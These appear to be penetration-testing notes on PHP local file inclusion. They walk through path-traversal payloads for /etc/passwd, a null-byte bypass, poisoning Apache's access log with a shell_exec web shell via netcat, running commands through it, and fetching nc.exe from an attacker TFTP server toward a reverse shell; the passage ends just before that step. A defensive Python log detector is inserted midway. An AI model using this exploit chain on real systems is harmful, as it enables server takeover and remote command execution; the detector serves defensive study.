File Inclusion/Path Traversal

After successfully uploading a file to the web app, path traversal can be tried by attempting to browse up to the root folder; on Linux:

fileshare.com/files.php?file=../../../../../../etc/passwd

Local File Inclusion

The ability to "include" any local file on the filesystem and execute any PHP code contained in the included file.

Vulnerability:

<?php
// Vulnerable: the language name is taken straight from the request and
// handed to include(), so a crafted LANG value can traverse the filesystem.
if (isset($_GET['LANG'])) { $lang = $_GET['LANG']; }
else { $lang = 'en'; }
include($lang . '.php');   // ".php" is appended; older PHP truncates the path at a null byte

With this, you can access files on the system by changing the value of the LANG attribute and using directory path traversal. Notice, however, that the vulnerable code appends .php to the value; in PHP versions below 5.3 this can be bypassed with a null byte (%00):

LANG=../../../../../../../../windows/system32/drivers/etc/hosts%00

If we can get PHP code written somewhere on the server filesystem, we can get a shell. Assuming we can't directly upload a file to the remote filesystem, we can contaminate the log files so that they contain PHP code:

$ nc 192.168.1.23 80
<?php echo shell_exec($_GET['cmd']);?>
HTTP/1.1 400 Bad Request

This connection results in the following text being written to the Apache log file located at C:\xampp\apache\logs\access.log, effectively introducing PHP code into a file on the local filesystem of the webserver:

192.168.1.23 - - [17/Apr/2013:06:22:00 -0400] " <?php echo shell_exec($_GET['cmd']);?>" 400 1047

Let's try including that log file and executing the malicious PHP code stored within it, by putting the pathname into the LANG attribute, and putting ipconfig in the cmd attribute:

<http://192.168.1.23/addguestbook.php?name=hi&comment=&cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00>

The result may be a little hard to see, as the entire log file will be dumped along with the command's output.
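From the defender's side, the two entries this attack leaves in access.log (the poisoning write with a PHP tag in the request field, and the later LFI read that combines traversal, a null byte and the log path) are easy to pick out. The following detector is an added example, not part of the original notes; the log lines are constructed to mirror the ones shown above.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines modelled on this page: a log-poisoning
# write (status 400), the LFI read of the poisoned log, and a benign request.
SAMPLE_LOG = r'''
192.168.1.23 - - [17/Apr/2013:06:22:00 -0400] " <?php echo shell_exec($_GET['cmd']);?>" 400 1047
192.168.1.23 - - [17/Apr/2013:06:23:10 -0400] "GET /addguestbook.php?name=hi&comment=&cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00 HTTP/1.1" 200 5120
10.0.0.5 - - [17/Apr/2013:06:24:00 -0400] "GET /addguestbook.php?LANG=en HTTP/1.1" 200 812
'''.strip()

# Each rule is applied to the URL-decoded request field of a log line.
RULES = [
    ("php_tag_in_request", re.compile(r"<\?php|<\?=", re.I)),
    ("path_traversal", re.compile(r"(\.\./|\.\.\\)")),
    ("null_byte_truncation", re.compile("\x00")),      # %00 after decoding
    ("log_file_targeted", re.compile(r"(access|error)\.log", re.I)),
    ("cmd_parameter", re.compile(r"[?&]cmd=", re.I)),
]

# Apache common log format: ip ident user [timestamp] "request" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>.*)" (?P<status>\d{3}) (?P<size>\S+)$'
)

def analyse_line(line):
    """Return (ip, status, [matched rule names]), or None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    req = unquote(m.group("req"))   # decode %2e%2e%2f, %00 and friends before matching
    hits = [name for name, rx in RULES if rx.search(req)]
    return m.group("ip"), int(m.group("status")), hits

def find_suspicious(log_text):
    """Return one finding per line that triggers at least one rule."""
    findings = []
    for line in log_text.splitlines():
        parsed = analyse_line(line)
        if parsed is None:
            continue
        ip, status, hits = parsed
        if hits:
            findings.append({"ip": ip, "status": status, "hits": hits})
    return findings

if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f)
```

A 400-status line whose request field carries a PHP tag is the poisoning write itself; a later request from the same source that traverses into the log directory is the trigger, so correlating the two by client IP gives a high-confidence alert.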

Let's get a shell now by transferring "nc.exe" to the webserver using the TFTP technique. First, start the TFTP server on the attacker machine with atftpd --daemon --port 69 /tftp and copy "nc.exe" into the hosting directory with cp /usr/share/windows-binaries/nc.exe /tftp. Now run tftp on the webserver through the LFI. Remember to URL encode the command string within the "cmd" attribute:

<http://192.168.1.23/addguestbook.php?name=hi&comment=&cmd=tftp+-i+[kali ip]+get+nc.exe&LANG=../../../../../../../xampp/apache/logs/access.log%00>

The webpage will hang for a while as it awaits the output of the tftp command that is downloading "nc.exe". Once done, execute the downloaded "nc.exe" and create a reverse shell: